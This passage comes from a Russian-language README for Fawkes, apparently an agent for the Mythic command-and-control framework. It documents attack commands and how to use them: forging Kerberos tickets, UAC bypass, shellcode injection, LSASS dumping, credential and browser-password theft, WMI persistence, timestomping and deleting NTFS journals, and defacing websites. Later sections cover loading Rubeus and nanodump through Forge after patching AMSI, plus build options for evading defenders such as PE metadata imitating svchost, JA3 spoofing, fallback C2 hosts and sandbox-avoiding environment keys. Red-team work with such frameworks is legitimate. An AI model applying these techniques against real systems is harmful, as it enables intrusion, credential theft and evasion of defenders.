ticket | `ticket -action forge\|request\|diamond\|renew\|s4u\|pkinit -realm <DOMAIN> -username <user> -key <hex_key> [-key_type aes256\|aes128\|rc4] [-format kirbi\|ccache] [-domain_sid <SID>] [-spn <SPN>] [-server <KDC>] [-impersonate <user>] [-krbtgt_key <hex>] [-target_user <user>] [-ticket <base64>] [-certificate <pem>] [-private_key <pem>]` | Создание, запрос, обновление, делегирование или аутентификация по сертификату для билетов Kerberos. Forge: золотые/серебряные билеты (офлайн). Request: Overpass-the-Hash (онлайн). Diamond: реальный обмен AS + модификация билета для уклонения. Renew: продление времени жизни TGT. S4U: ограниченное делегирование через S4U2Self+S4U2Proxy. PKINIT: аутентификация по сертификату из ADCS/Shadow Creds. Кроссплатформенный (T1558.001, T1558.002, T1550.002, T1134.001, T1649).
tr | `tr -path <file> -from [:lower:] -to [:upper:]` | Преобразование, сжатие или удаление символов в содержимом файла. Поддерживает классы символов и диапазоны. Кроссплатформенный (T1083).
triage | `triage -action <all\|documents\|credentials\|configs\|database\|scripts\|archives\|mail\|recent\|custom\|recon-chain> [-path <dir>] [-hours <n>] [-target <subnet>] [-username <user>] [-password <pass>]` | Поиск ценных файлов для эксфильтрации — документы, учетные данные, конфиги, базы данных (.db/.sqlite), скрипты (.py/.sh/.ps1), архивы (.zip/.tar/.7z), файлы почты (.pst/.eml/.mbox), недавно измененные файлы или пользовательский путь. **recon-chain**: автоматизированная цепочка подзадач — portscan → перечисление общих ресурсов SMB → охота на общих ресурсах → локальная триаж (требует цель, имя пользователя/пароль). Кроссплатформенный (T1083, T1005).
trust | `trust -server <DC> -username <user@domain> -password <pass> [-use_tls]` | Перечисление доверительных отношений домена/леса через LDAP с топологией леса, анализом транзитивности, стойкостью шифрования и определением путей атаки. Кроссплатформенный (T1482).
timestomp | `timestomp -action <get\|copy\|set\|match\|random\|clean-prefetch> -target <file> [-source <file>] [-timestamp <time>]` | Изменение временных меток файла для маскировки. Получение, копирование из другого файла, установка конкретного времени, соответствие соседям по каталогу (IQR) или случайный выбор в пределах диапазона. `clean-prefetch` удаляет файлы Prefetch Windows для указанного исполняемого файла. Windows также изменяет время создания.
tscon | `tscon [-action <list\|hijack\|disconnect\|logoff>] [-session_id <id>]` | **(Только Windows)** Управление сеансами RDP — список, перехват, отключение или завершение сеансов. Захват сеанса без учетных данных (T1563.002).
ts | `ts [-a] [-i PID]` | **(Только Windows)** Список потоков в процессах. По умолчанию показывает только потоки, находящиеся в состоянии ожидания (Suspended/DelayExecution). Используйте -a для всех потоков, -i для фильтрации по PID (T1057).
uac-bypass | `uac-bypass [-technique fodhelper\|computerdefaults\|sdclt\|eventvwr\|silentcleanup\|cmstp\|dismhost\|wusa] [-command <path>]` | **(Только Windows)** Обход UAC для повышения с уровня medium до high. 8 методов: перехват реестра, перехват переменной среды, злоупотребление INF-файлами, перехват CLSID COM, поддельная доверенная директория. По умолчанию запускает обратный вызов с повышенными правами (T1548.002, T1218.003).
uniq | `uniq -path <file> [-count true] [-duplicate true] [-unique_only true]` | Фильтрация или подсчет последовательных дублирующихся строк в файле. Режим подсчета сортирует по частоте. Кроссплатформенный (T1083).
unlink | `unlink -connection_id <uuid>` | Отключение связанного P2P-агента (TCP или именованный канал). Кроссплатформенный (T1572).
uptime | `uptime` | Показать время работы системы, время загрузки и средние нагрузки. Кроссплатформенный (T1082).
upload | `upload` | Загрузка файла на целевой хост с передачей частями. Поддерживает автоматическую распаковку gzip-файлов. Проверка SHA256.
usn-jrnl | `usn-jrnl -action query\|recent\|delete [-volume C:]` | **(Только Windows)** Запрос или удаление журнала изменений NTFS USN — уничтожает историю операций с файлами для антикриминалистики (T1070.004).
vanilla-injection | `vanilla-injection -action <inject\|migrate\|ldpreload> -pid <PID>` | Внедрение шелл-кода в удаленный процесс (inject), миграция агента (migrate: внедрение + выход) или создание нового процесса с LD_PRELOAD .so (ldpreload: только Linux, без ptrace, обходит Yama). **Windows:** VirtualAllocEx/WriteProcessMemory/CreateRemoteThread. **Linux (amd64/arm64):** прямая запись в /proc/PID/mem, LD_PRELOAD через memfd. T1055.001, T1055.009, T1574.006.
vm-detect | `vm-detect [-action detect\|sandbox]` | Обнаружение среды VM/гипервизора или анализ обхода песочницы. `detect`: OUI MAC, DMI/SMBIOS, инструменты VM, SCSI, флаг CPU hypervisor. `sandbox`: скоринговый анализ — количество CPU, ОЗУ, диск, время работы, тайминги сна, имя хоста, количество процессов, имя пользователя. Кроссплатформенный (T1497, T1497.001).
vss | `vss -action <list\|create\|delete\|delete-all\|extract\|inhibit-recovery\|shutdown\|reboot> [-volume C:\\] [-id <id>] [-confirm true]` | Техники воздействия: управление VSS (Windows), подавление восстановления (T1490), выключение/перезагрузка (T1529, кроссплатформенно). Разрушительные действия требуют -confirm true. MITRE T1003.003, T1490, T1529.
watch-dir | `watch-dir -path <dir> [-interval 5] [-duration 300] [-depth 3] [-pattern *.docx] [-hash true]` | Мониторинг каталога на изменения файловой системы — обнаружение новых, измененных и удаленных файлов через опрос. Поддерживает фильтрацию по glob и обнаружение хэша MD5. Кроссплатформенный (T1083, T1119).
wc | `wc -path <file_or_dir> [-pattern <glob>]` | Подсчет строк, слов, символов и байтов в файлах. Режим каталога с фильтрацией по шаблону glob и итогами. Кроссплатформенный (T1083).
wdigest | `wdigest -action <status\|enable\|disable>` | **(Только Windows)** Управление кэшированием открытых текстовых паролей WDigest. Включение для захвата паролей в открытом виде при следующем входе. MITRE T1003.001, T1112.
winrm | `winrm -host <target> -username <user> [-password <pass>] [-hash <NT hash>] -command <cmd> [-shell cmd\|powershell] [-auto-verify]` или `winrm -action check -host <target> [-username <user> -password <pass>]` | Выполнение команд на удаленных хостах Windows через WinRM с аутентификацией NTLM. Поддерживает pass-the-hash, cmd.exe и PowerShell. `check` проверяет предварительные требования WinRM (порты 5985/5986, аутентификация, оболочка). Кроссплатформенный (T1021.006, T1550.002).
windows | `windows [-action list\|search] [-filter <string>] [-all]` | **(Только Windows)** Перечисление видимых окон приложений — показывает HWND, PID, имя процесса, класс окна и заголовок. Поиск фильтрует по заголовку/процессу/классу. MITRE T1010.
who | `who [-all true]` | Показать вошедших в систему пользователей и активные сеансы. Linux: парсинг utmp. Windows: WTS API. macOS: команда who. Кроссплатформенный (T1033).
whoami | `whoami` | Отображение текущего пользователя и контекста безопасности. Windows: имя пользователя, SID, тип токена, уровень целостности, членство в группах, привилегии. Linux: пользователь, UID, GID, группы, эффективные возможности (расшифрованные), контекст SELinux/AppArmor, обнаружение контейнера. macOS: пользователь, UID, GID, группы.
wmi | `wmi -action <execute\|query\|process-list\|os-info\|upload\|exec-staged\|check> [-target <host>] [-command <cmd>] [-query <wql>]` | **(Только Windows)** Выполнение WMI-запросов, создание процессов, загрузка файлов и поэтапное выполнение через COM API. upload: передача файлов через certutil/PowerShell staging. exec-staged: загрузка, затем выполнение с автоочисткой. `check` проверяет предварительные требования WMI (RPC 135, связь WMI). MITRE T1047, T1570.
wmi-persist | `wmi-persist -action <install\|remove\|list> -name <id> -trigger <logon\|startup\|interval\|process> -command <exe> [-consumer_type <command\|script>]` | **(Только Windows)** Персистентность через подписку на события WMI через COM API. Поддерживает потребители CommandLine и ActiveScript (VBScript/JScript). Бесфайлово, переживает перезагрузки. MITRE T1546.003.
wlan-profiles | `wlan-profiles [-name <SSID>]` | Восстановление сохраненных профилей и учетных данных WiFi. Windows: WLAN API, Linux: NetworkManager/wpa_supplicant/iwd, macOS: связка ключей. Кроссплатформенный (T1555).
write-file | `write-file [-action write\|deface] -path <file> -content <text> [-base64 true] [-append true] [-mkdir true] [-confirm DEFACE]` | Запись содержимого в файлы или порча веб-страниц. `write`: создание/перезапись/добавление (по умолчанию). `deface`: замена веб-контента сообщением о порче (T1491, защитная блокировка). Кроссплатформенный (T1105, T1491).
write-memory | `write-memory <dll_name> <function_name> <start_index> <hex_bytes>` | **(Только Windows)** Запись байтов в адрес функции DLL.
xattr | `xattr -action <list\|get\|set\|delete> -path <file> [-name <attr>] [-value <data>] [-hex true]` | **(Только Linux/macOS)** Управление расширенными атрибутами файлов — список, получение, установка, удаление. Unix-дополнение к Windows ADS для сокрытия данных (T1564.004).## Расширение команд Forge

Fawkes поддерживает расширение команд [Mythic Forge](https://github.com/MythicAgents/forge), которое динамически дополняет возможности агента внешними наборами инструментов. Когда Forge установлен вместе с Mythic, дополнительные команды автоматически появляются в интерфейсе Mythic для обратных вызовов Fawkes — без необходимости пересборки агента.

**Поддерживаемые коллекции инструментов:**

| Коллекция | Тип | Выполняется через | Примеры |
|------------|------|-------------|----------|
| [SharpCollection](https://github.com/Flangvik/SharpCollection) | .NET сборки | `inline-assembly` | Seatbelt, SharpUp, Rubeus, Certify, SharpHound, SharpDPAPI |
| [Sliver Armory](https://github.com/MythicAgents/forge) | BOF/COFF файлы | `inline-execute` | SA-whoami, SA-adcs-enum, SA-ldapsearch, SA-nanodump |

### Установка (новая установка)

**Шаг 1: Установка Forge**```bash
cd /path/to/Mythic
sudo ./mythic-cli install github https://github.com/MythicAgents/forge

Шаг 2: Добавление Fawkes в поддержку типов полезной нагрузки Forge

Отредактируйте InstalledServices/forge/payload_type_support.json и добавьте запись Fawkes в JSON-массив:```json { "agent": "fawkes", "bof_command": "inline-execute", "bof_file_parameter_name": "bof_file", "bof_argument_array_parameter_name": "coff_arguments", "bof_entrypoint_parameter_name": "function_name", "inline_assembly_command": "inline-assembly", "inline_assembly_file_parameter_name": "assembly_file", "inline_assembly_argument_parameter_name": "assembly_arguments", "execute_assembly_command": "", "execute_assembly_file_parameter_name": "", "execute_assembly_argument_parameter_name": "", "assembly_default_execution_method": "inline_assembly" }

Это сопоставляет общий интерфейс параметров Forge с конкретными именами команд и параметров Fawkes. Сопоставление полей:
- `bof_command` → команда Fawkes `inline-execute` (выполнение BOF/COFF)
- `inline_assembly_command` → команда Fawkes `inline-assembly` (выполнение сборок .NET)
- `execute_assembly_command` → пусто (Fawkes использует inline-assembly для всех выполнений .NET)
- Имена параметров должны в точности соответствовать тому, что определяют функции агента Fawkes в группе параметров "Forge"

**Шаг 3: Перестройте и перезапустите**```bash
sudo ./mythic-cli build forge
sudo ./mythic-cli restart forge
sudo ./mythic-cli restart fawkes

Шаг 4: Регистрация источников инструментов

Откройте пользовательский интерфейс Mythic и используйте команду forge_register (доступна на любом callback-е) для регистрации источников инструментов. Распространённые источники:

ИсточникТипЧто предоставляет
Rubeus.NET сборкаАтаки Kerberos (kerberoasting, манипуляции с билетами, делегирование)
Seatbelt.NET сборкаОбследование безопасности хоста (привилегии, учётные данные, конфигурации)
Certify.NET сборкаПеречисление и эксплуатация служб сертификатов AD
SharpHound.NET сборкаСбор данных BloodHound
SharpUp.NET сборкаПроверки локального повышения привилегий
SharpView.NET сборкаПеречисление Active Directory (порт PowerView)
nanodumpBOFДамп памяти LSASS через MiniDumpWriteDump
credmanBOFСбор учётных данных из диспетчера учётных данных Windows

Для регистрации источника выполните forge_register с commandName, установленным на простое имя источника (например, Rubeus, а не forge_net_Rubeus), и remove, установленным на false.

После регистрации Forge загружает бинарные файлы инструментов и создаёт расширенные команды (например, forge_net_Rubeus, forge_bof_nanodump), которые появляются в списке команд callback-а.

Шаг 5: Проверка

Существующие callback-ы автоматически видят команды Forge — новая нагрузка не требуется. Проверьте, запустив зарегистрированный инструмент:

  1. Сначала выполните autopatch или start-clr (патч AMSI для .NET инструментов)
  2. Выберите команду Forge (например, forge_net_Seatbelt)
  3. Введите аргументы (например, -group=system)
  4. Выполните — Forge преобразует команду в inline-assembly со встроенным бинарным файлом инструмента

Советы по использованию

  • Для .NET инструментов (SharpCollection) сначала выполните start-clr с autopatch, чтобы инициализировать CLR и пропатчить AMSI — без этого Защитник Windows может заблокировать выполнение сборки
  • Для BOF-инструментов (Sliver Armory) убедитесь, что BOF скомпилированы для x64
  • Никакие специальные параметры сборки не требуются — поддержка Forge встроена в команды inline-execute и inline-assembly Fawkes через группу параметров "Forge"
  • Команды Forge работают на существующих callback-ах без пересборки агента
  • При отправке команд Forge через API включайте payload_type: "forge" в мутацию createTask — без этого Mythic ищет только среди собственного типа нагрузки callback-а

Техники инъекций

Инъекция PoolParty

ВариантТехникаТриггерGo-шеллкод
1Перезапись стартовой процедуры фабрики WorkerСоздание нового рабочего потокаНет
2Вставка TP_WORKОбработка очереди задачДа
3Вставка TP_WAITСигнализация событийДа
4Вставка TP_IOЗавершение файлового ввода/выводаДа
5Вставка TP_ALPCОбмен сообщениями через ALPCДа
6Вставка TP_JOBНазначение объекта заданияДа
7Вставка TP_DIRECTПорт завершения ввода/выводаДа
8Вставка TP_TIMERИстечение таймераДа

Инъекция Opus

ВариантТехникаЦельGo-шеллкод
1Цепочка обработчиков Ctrl-CТолько консольные процессыНет
4PEB KernelCallbackTableТолько GUI-процессыДа

Описания вариантов см. в Детали техник инъекций.

Параметры сборки

Методы экспорта DLL

При сборке в режиме shared (DLL) или windows-shellcode параметр сборки dll_exports управляет тем, какие экспорты DLL включаются:

НастройкаЭкспортыСлучай использования
standard (по умолчанию)Run, Fire, VoidFuncsRDI-шеллкод, rundll32, универсальные загрузчики
fullStandard + DllRegisterServer, DllUnregisterServer, ServiceMain, DllGetClassObject, DllCanUnloadNowregsvr32, svchost-сервис, COM-угон

Методы выполнения с полными экспортами:

ЭкспортВыполнениеMITRE
DllRegisterServerregsvr32 /s fawkes.dllT1218.010
DllUnregisterServerregsvr32 /u /s fawkes.dllT1218.010
ServiceMainsvchost.exe DLL-сервис (только Windows)T1543.003
DllGetClassObject + DllCanUnloadNowCOM-угон InprocServer32T1546.015

Инфляция бинарного файла

Fawkes поддерживает опциональную инфляцию бинарного файла во время сборки. Это встраивает блок повторяющихся байтов в скомпилированный агент, что может быть использовано для увеличения размера файла или снижения показателей энтропии.

Два параметра сборки управляют этим:

  • inflate_bytes — шестнадцатеричные байты для встраивания (например, 0x90 или 0x41,0x42)
  • inflate_count — количество повторений шаблона байтов

Шаблон байтов повторяется inflate_count раз, поэтому общий добавленный размер равен длина(шаблон_байтов) * inflate_count.

Быстрая справка по размерам:

inflate_countОдин байт (например, 0x90)Два байта (например, 0x41,0x42)
1,0001 КБ2 КБ
10,00010 КБ20 КБ
100,000100 КБ200 КБ
1,000,0001 МБ2 МБ
3,000,0003 МБ6 МБ
10,000,00010 МБ20 МБ

Если инфляция не настроена, к бинарному файлу добавляется только 1 байт служебных данных.

Встраивание ресурсов PE (только Windows)

Бинарные файлы PE для Windows содержат метаданные ресурсов — информацию о версии, значки и манифесты UAC, которые видны в свойствах файла, диспетчере задач и проводнике. По умолчанию бинарные файлы Go не содержат таких метаданных, что является сильным сигналом обнаружения для инструментов безопасности и аналитиков.

Fawkes поддерживает встраивание ресурсов PE во время сборки для имитации легитимных бинарных файлов Windows:

Параметры сборки:

ПараметрТипОписание
pe_presetВыборБыстрый пресет для имитации (notepad, svchost, cmd, explorer и т.д.)
pe_companyСтрокаCompanyName (например, "Microsoft Corporation")
pe_descriptionСтрокаFileDescription — видно в диспетчере задач
pe_productСтрокаProductName
pe_versionСтрокаВерсия файла/продукта (например, "10.0.19041.1")
pe_copyrightСтрокаLegalCopyright
pe_original_filenameСтрокаOriginalFilename — видно криминалистическим инструментам
pe_iconФайлПользовательский файл значка .ico или .png
pe_manifestВыборУровень UAC: asInvoker, highestAvailable, requireAdministrator

Пресеты (10 распространённых бинарных файлов Windows с реальной версией): notepad, svchost, cmd, explorer, msiexec, dllhost, rundll32, conhost, taskhostw, RuntimeBroker

Отдельные поля переопределяют значения пресетов. Если никакие параметры ресурсов PE не заданы, бинарный файл остаётся неизменным, как при стандартном выводе Go.

Функции OpSec

Отслеживание артефактов

Fawkes автоматически регистрирует артефакты в Mythic для команд, важных с точки зрения opsec. Артефакты отображаются в пользовательском интерфейсе Mythic на вкладке Артефакты, предоставляя операторам чёткую картину всех криминалистических индикаторов, созданных во время взаимодействия.

Отслеживаемые типы артефактов:

ТипКоманды
Создание процессаrun, powershell, spawn, argue
Вызов APInet-enum, net-user, service, wmi, schtask, procdump, hashdump, eventlog, ntdll-unhook, syscalls, firewall, dcom, vss (create/delete), psexec
Завершение процессаkill
Инъекция в процессvanilla-injection, apc-injection, threadless-inject, poolparty-injection, opus-injection, module-stomp, thread-hijack
Запись файлаupload, cp, mv
Создание файлаmkdir
Удаление файлаrm
Изменение файлаtimestomp
Запись в реестрreg (write/delete), remote-reg (set/delete), persist (registry, com-hijack, screensaver methods), uac-bypass, defender (add/remove-exclusion)
Сохранение реестраreg (save/creds)
Удалённый реестрremote-reg (query/enum/set/delete через WinReg RPC)
Удалённая службаremote-service (list/query/create/start/stop/delete/modify-path/trigger/dll-sideload через SVCCTL RPC)
Вход в системуmake-token
Кража токенаsteal-token, getsystem

Команды только для чтения (ls, ps, cat, env и т.д.) не создают артефактов.

Интеграция с хранилищем учётных данных

Команды сбора учётных данных автоматически сообщают о находках в хранилище Учётные данные Mythic, делая их доступными для поиска и экспорта из пользовательского интерфейса Mythic.

КомандаТип учётных данныхЧто сообщается
hashdumpхэшSAM NTLM-хэши (Windows), MSV1_0 NT/LM/SHA-хэши из обхода LSASS на месте (Windows, insitu-full), Kerberos TGT и билеты служб в формате .kirbi (Windows, tickets), хэши /etc/shadow (Linux), PBKDF2-хэши (macOS)
kerberoastхэшTGS-билеты для офлайн-взлома
asrep-roastхэшAS-REP-хэши
dcsyncхэшNTLM + ключи AES через DRSGetNCChanges
lsa-secretsоткрытый текст/хэш/ключПароли служб, кэшированные учётные данные, ключи DPAPI
lapsоткрытый текстПароли LAPS v1 и v2
gpp-passwordоткрытый текстЗашифрованные пароли GPP из SYSVOL
browserоткрытый текстСохранённые пароли Chrome/Edge/Firefox (все платформы), куки (все платформы), история, автозаполнение, закладки
dpapiоткрытый текст/хэшСекреты, защищённые DPAPI
credmanоткрытый текстЗаписи диспетчера учётных данных (при действии дампа)
make-tokenоткрытый текстУчётные данные, использованные для создания токена
cred-harvestхэш/открытый текст/токенТеневые хэши, переменные окружения облака, чувствительные переменные окружения, OAuth/JWT-токены M365, живые куки/хранилища браузера через CDP
credential-promptоткрытый текстУчётные данные, захваченные через диалоговое окно (macOS/Windows/Linux)

Отслеживание нажатий клавиш

Команда keylog интегрируется с функцией Keylogs Mythic. Когда нажатия клавиш возвращаются через stop или dump, они автоматически разбираются по заголовкам окон и отправляются в трекер нажатий клавиш Mythic с привязкой к пользователю. Нажатия клавиш доступны для поиска в пользовательском интерфейсе Mythic по заголовку окна, пользователю или содержимому нажатий.

Отслеживание токенов

Команды make-token и steal-token регистрируют токены в трекере Токены обратных вызовов Mythic. Это обеспечивает видимость того, какие токены связаны с каждым callback-ом, включая олицетворённую личность пользователя и исходный процесс. Команда rev2self автоматически удаляет отслеживаемые токены, когда олицетворение сбрасывается.

Проверка сертификатов TLS

Управляйте тем, как агент проверяет HTTPS-сертификаты при связи с C2-сервером. Настраивается во время сборки через параметр tls_verify:

РежимОписание
noneПропустить всю проверку TLS (по умолчанию, обратно совместимо)
system-caПроверять сертификаты через доверенное хранилище ОС
pinned:<sha256>Привязать к конкретному отпечатку сертификата (SHA-256 hex). Агент отклоняет соединения, если сертификат сервера не совпадает.

Привязка сертификатов предотвращает MITM-перехват трафика агента, даже если злоумышленник контролирует доверенный ЦС.

Спуфинг отпечатка TLS (JA3)

Стандартный стек TLS Go выдаёт характерный JA3-хэш, который инструменты сетевой безопасности могут идентифицировать как не-браузерный трафик. Параметр сборки tls_fingerprint использует uTLS для спуфинга ClientHello TLS, создавая JA3-отпечаток, соответствующий браузеру.

ОтпечатокОписание
chromeChrome/Chromium (по умолчанию) — самый распространённый браузер, лучший для слияния
firefoxFirefox
safariSafari
edgeMicrosoft Edge
rotateСлучайным образом выбирает Chrome/Firefox/Safari/Edge для каждого соединения (предотвращает корреляцию JA3)
randomПолностью рандомизированный отпечаток (не соответствует браузеру)
goБез спуфинга — использовать стандартный стек TLS Go

Взаимная аутентификация по TLS-сертификату клиента (mTLS)

Добавьте аутентификацию по клиентскому сертификату в профиль C2 HTTP. При настройке агент предоставляет клиентский сертификат во время рукопожатия TLS, позволяя C2-серверу проверить идентичность агента. Это предотвращает пассивный перехват HTTPS и MITM-атаки через прокси.

ПараметрОписание
mtls_certPEM-кодированный клиентский сертификат
mtls_keyPEM-кодированный закрытый ключ клиента

Сертификат/ключ кодируются в base64 при сборке, XOR-шифруются, если включено обфускация строк, и хранятся в хранилище конфигурации AES-256-GCM во время выполнения. Сочетается с существующими режимами проверки TLS и спуфингом отпечатка JA3.

Резервные URL C2

Несколько URL обратных вызовов C2 с автоматическим переключением на резервный. Если основной хост обратного вызова недоступен, агент прозрачно перебирает резервные URL, прежде чем применить задержку.

ПараметрОписание
fallback_hostsРазделённые запятыми резервные хосты C2 (например, http://backup1.example.com,https://backup2.example.com)

Тот же порт и шифрование, что и у основного. Запоминает последний успешный URL. Работает с хранилищем конфигурации и XOR-обфускацией.

Привязка к окружению / Ограничители

Предотвратите выполнение агента на неавторизованных системах. Настраивается во время сборки — агент молча завершает работу до установления какого-либо сетевого контакта, если проверки не пройдены. Никакого логирования, никаких артефактов, никакого трафика C2.

ПараметрТипОписание
env_key_hostnameRegexИмя хоста должно соответствовать (например, WORKSTATION-\d+ или .*\.contoso\.com)
env_key_domainRegexДомен должен соответствовать (например, CONTOSO или .*\.local)
env_key_usernameRegexИмя пользователя должно соответствовать (например, admin.* или svc_.*)
env_key_processСтрокаИмя процесса, который должен быть запущен (например, outlook.exe)
env_key_cpuidRegexСтрока бренда CPU должна соответствовать (например, .*Intel.*i7-12700.* или .*AMD.*5950X.*). Предотвращает выполнение в песочницах с другими моделями CPU.
env_key_deriveВыборЗашифровать конфигурацию C2 с помощью ключа, полученного из свойств целевого хоста. Варианты: hostname, domain, username, hostname+domain, hostname+domain+username. Неправильный хост = сбой AES-дешифрования = молчаливый выход. Сильнее, чем проверка regex — значения конфигурации никогда не появляются в бинарном файле.

Read more

Категории